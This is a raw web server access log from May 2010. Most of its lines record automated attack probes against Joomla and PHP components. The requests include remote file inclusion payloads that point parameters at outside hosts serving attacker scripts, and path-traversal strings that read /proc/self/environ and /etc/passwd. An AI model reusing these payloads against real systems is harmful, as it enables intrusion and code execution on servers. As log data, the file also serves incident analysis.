88.191.94.188 - - [19/May/2010:07:21:48 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 314 "-""Mozilla/5.0"
88.191.94.188 - - [19/May/2010:07:21:48 -0500] "GET /logs/access_log.1265760000//skin/zero_vote/error.php?dir=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
88.191.94.188 - - [19/May/2010:07:21:48 -0500] "GET /logs/access_log.1265241600//skin/zero_vote/error.php?dir=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
88.191.94.188 - - [19/May/2010:07:21:51 -0500] "GET /logs/access_log.1265241600//skin/zero_vote/error.php?dir=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
194.17.7.160 - - [19/May/2010:07:22:05 -0500] "GET /logs/access_log.1268956800%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
194.17.7.160 - - [19/May/2010:07:22:44 -0500] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
194.17.7.160 - - [19/May/2010:07:22:44 -0500] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
194.17.7.160 - - [19/May/2010:07:22:44 -0500] "GET /logs/access_log.1273363200//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
194.17.7.160 - - [19/May/2010:07:22:56 -0500] "GET /logs/access_log.1268956800//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
121.190.102.21 - - [19/May/2010:07:23:09 -0500] "GET /logs/access_log.1271548800//bbs/skin/zero_vote/ask_password.php/bbs//skin/zero_vote/ask_password.php?dir=http://www.armycadetleagueab.ca/cache/id1.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
121.190.102.21 - - [19/May/2010:07:23:09 -0500] "GET //bbs/skin/zero_vote/ask_password.php/bbs//skin/zero_vote/ask_password.php?dir=http://www.armycadetleagueab.ca/cache/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
121.190.102.21 - - [19/May/2010:07:23:09 -0500] "GET /logs//bbs/skin/zero_vote/ask_password.php/bbs//skin/zero_vote/ask_password.php?dir=http://www.armycadetleagueab.ca/cache/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
111.67.9.133 - - [19/May/2010:07:26:02 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.823"
111.67.9.133 - - [19/May/2010:07:26:17 -0500] "GET /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
111.67.9.133 - - [19/May/2010:07:26:18 -0500] "GET /logs/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.823"
111.67.9.133 - - [19/May/2010:07:26:40 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.823"
111.67.9.133 - - [19/May/2010:07:26:41 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
111.67.9.133 - - [19/May/2010:07:26:41 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.823"
111.67.9.133 - - [19/May/2010:07:27:27 -0500] "GET /logs/access_log.1273017600/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.823"
111.67.9.133 - - [19/May/2010:07:27:27 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
111.67.9.133 - - [19/May/2010:07:27:28 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.823"
121.190.102.21 - - [19/May/2010:07:28:05 -0500] "GET /logs/access_log.1271548800//bbs/skin/zero_vote/ask_password.php/bbs//skin/zero_vote/ask_password.php?dir=http://www.armycadetleagueab.ca/cache/id1.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
121.190.102.21 - - [19/May/2010:07:28:05 -0500] "GET /logs//bbs/skin/zero_vote/ask_password.php/bbs//skin/zero_vote/ask_password.php?dir=http://www.armycadetleagueab.ca/cache/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
121.190.102.21 - - [19/May/2010:07:28:05 -0500] "GET //bbs/skin/zero_vote/ask_password.php/bbs//skin/zero_vote/ask_password.php?dir=http://www.armycadetleagueab.ca/cache/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
207.46.13.51 - - [19/May/2010:07:33:06 -0500] "GET /logs/access_log.1180051200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
111.67.9.133 - - [19/May/2010:07:34:33 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.823"
87.250.255.243 - - [19/May/2010:07:34:54 -0500] "GET /logs/access_log.1178064000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.23.20.123 - - [19/May/2010:07:34:59 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:07:34:59 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
209.200.252.2 - - [19/May/2010:07:37:25 -0500] "GET /index.php?option=com_news_portal&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""-"
209.200.252.2 - - [19/May/2010:07:37:25 -0500] "GET /index.php?option=com_news_portal&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 293 "-""-"
110.137.118.170 - - [19/May/2010:07:41:15 -0500] "GET /logs/access_log.1264118400 HTTP/1.1" 404 310 "http://www.bing.com/search?FORM=DNSAS&q=74.50.21.141+yahoo.com+www.yahoo.com""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
112.216.153.186 - - [19/May/2010:07:43:15 -0500] "GET /logs/access_log.1262736000//skin/happycast/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
112.216.153.186 - - [19/May/2010:07:43:15 -0500] "GET /logs//skin/happycast/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
112.216.153.186 - - [19/May/2010:07:43:15 -0500] "GET //skin/happycast/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
207.46.204.243 - - [19/May/2010:07:46:07 -0500] "GET /logs/access_log.1272499200 HTTP/1.1" 200 478222 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.23.20.123 - - [19/May/2010:07:46:31 -0500] "GET /logs/access_log.1273276800/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:07:46:31 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:07:46:31 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:07:46:48 -0500] "GET /logs/access_log.1273276800/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:07:46:48 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:07:46:49 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:07:48:06 -0500] "GET /logs/access_log.1272844800/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:07:48:22 -0500] "GET /logs/access_log.1272844800/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
87.250.255.243 - - [19/May/2010:07:50:59 -0500] "GET /logs/access_log.1194739200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.195.235 - - [19/May/2010:07:57:06 -0500] "GET /logs/access_log.1266192000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.163.180.32 - - [19/May/2010:07:57:35 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
186.28.232.13 - - [19/May/2010:07:58:02 -0500] "GET /logs/access_log.1205107200//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mantisowh.be/images/fuck.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
186.28.232.13 - - [19/May/2010:07:58:02 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mantisowh.be/images/fuck.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
186.28.232.13 - - [19/May/2010:07:58:02 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mantisowh.be/images/fuck.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
112.216.153.186 - - [19/May/2010:08:02:15 -0500] "GET //skin/happycast/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
112.216.153.186 - - [19/May/2010:08:02:15 -0500] "GET /logs//skin/happycast/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
112.216.153.186 - - [19/May/2010:08:02:15 -0500] "GET /logs/access_log.1271894400%20%20//skin/happycast/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
77.234.201.88 - - [19/May/2010:08:03:37 -0500] "GET //?option=com_joomlalib/index.php?option=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
77.234.201.88 - - [19/May/2010:08:03:37 -0500] "GET /logs//?option=com_joomlalib/index.php?option=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 200 6151 "-""Mozilla/5.0"
77.234.201.88 - - [19/May/2010:08:03:37 -0500] "GET /logs/access_log.1262649600//?option=com_joomlalib/index.php?option=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
77.234.201.88 - - [19/May/2010:08:04:14 -0500] "GET /logs/access_log.1264118400//?option=com_joomlalib/index.php?option=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
80.71.1.68 - - [19/May/2010:08:04:33 -0500] "GET //errors.php?error=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
80.71.1.68 - - [19/May/2010:08:04:34 -0500] "GET /logs//errors.php?error=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
87.250.255.243 - - [19/May/2010:08:04:48 -0500] "GET /logs/access_log.1228435200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
91.142.208.158 - - [19/May/2010:08:05:41 -0500] "GET /logs/access_log.1205107200//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mantisowh.be/images/fuck.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
91.142.208.158 - - [19/May/2010:08:05:41 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mantisowh.be/images/fuck.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
91.142.208.158 - - [19/May/2010:08:05:42 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mantisowh.be/images/fuck.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
111.67.9.133 - - [19/May/2010:08:07:34 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.823"
212.69.208.145 - - [19/May/2010:08:07:45 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.73"
69.163.180.32 - - [19/May/2010:08:07:46 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
216.129.119.43 - - [19/May/2010:08:08:36 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.13.145 - - [19/May/2010:08:09:06 -0500] "GET /logs/access_log.1198713600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.55.52.154 - - [19/May/2010:08:10:54 -0500] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.55.52.154 - - [19/May/2010:08:10:55 -0500] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
88.191.94.188 - - [19/May/2010:08:11:21 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 334 "-""Mozilla/5.0"
88.191.94.188 - - [19/May/2010:08:11:21 -0500] "GET /logs/access_log.1264982400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 361 "-""Mozilla/5.0"
88.191.94.188 - - [19/May/2010:08:11:21 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 339 "-""Mozilla/5.0"
88.191.94.188 - - [19/May/2010:08:11:30 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 334 "-""Mozilla/5.0"
88.191.94.188 - - [19/May/2010:08:11:30 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 339 "-""Mozilla/5.0"
88.191.94.188 - - [19/May/2010:08:11:30 -0500] "GET /logs/access_log.1264982400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 361 "-""Mozilla/5.0"
111.67.9.133 - - [19/May/2010:08:11:46 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.823"
94.23.9.198 - - [19/May/2010:08:13:13 -0500] "GET /index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
74.54.63.138 - - [19/May/2010:08:13:14 -0500] "GET /index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:08:13:14 -0500] "GET /index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:08:13:14 -0500] "GET /index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
94.23.9.198 - - [19/May/2010:08:13:15 -0500] "GET /index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
70.38.71.147 - - [19/May/2010:08:13:17 -0500] "GET /index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.54.63.138 - - [19/May/2010:08:13:19 -0500] "GET /index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:08:13:19 -0500] "GET /index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
212.69.208.145 - - [19/May/2010:08:13:20 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.73"
212.69.208.145 - - [19/May/2010:08:13:20 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.73"
212.69.208.145 - - [19/May/2010:08:13:20 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.73"
207.46.204.191 - - [19/May/2010:08:13:35 -0500] "GET /logs/access_log.1177891200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.108.70.32 - - [19/May/2010:08:14:03 -0500] "GET /index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
212.69.208.145 - - [19/May/2010:08:14:29 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.73"
80.71.1.68 - - [19/May/2010:08:14:31 -0500] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
80.71.1.68 - - [19/May/2010:08:14:31 -0500] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
87.250.255.243 - - [19/May/2010:08:16:17 -0500] "GET /logs/access_log.1155513600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
74.54.63.138 - - [19/May/2010:08:16:24 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:08:16:24 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:08:16:25 -0500] "GET /index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:08:16:25 -0500] "GET /index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:08:16:25 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:08:16:25 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:08:16:40 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:08:16:40 -0500] "GET /index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:08:16:40 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
94.23.9.198 - - [19/May/2010:08:17:05 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:08:17:06 -0500] "GET /index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:08:17:06 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:08:17:08 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:08:17:09 -0500] "GET /index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:08:17:09 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
74.54.63.138 - - [19/May/2010:08:17:12 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:08:17:12 -0500] "GET /index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:08:17:12 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:08:17:42 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:08:17:42 -0500] "GET /index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:08:17:42 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
70.38.71.147 - - [19/May/2010:08:18:01 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
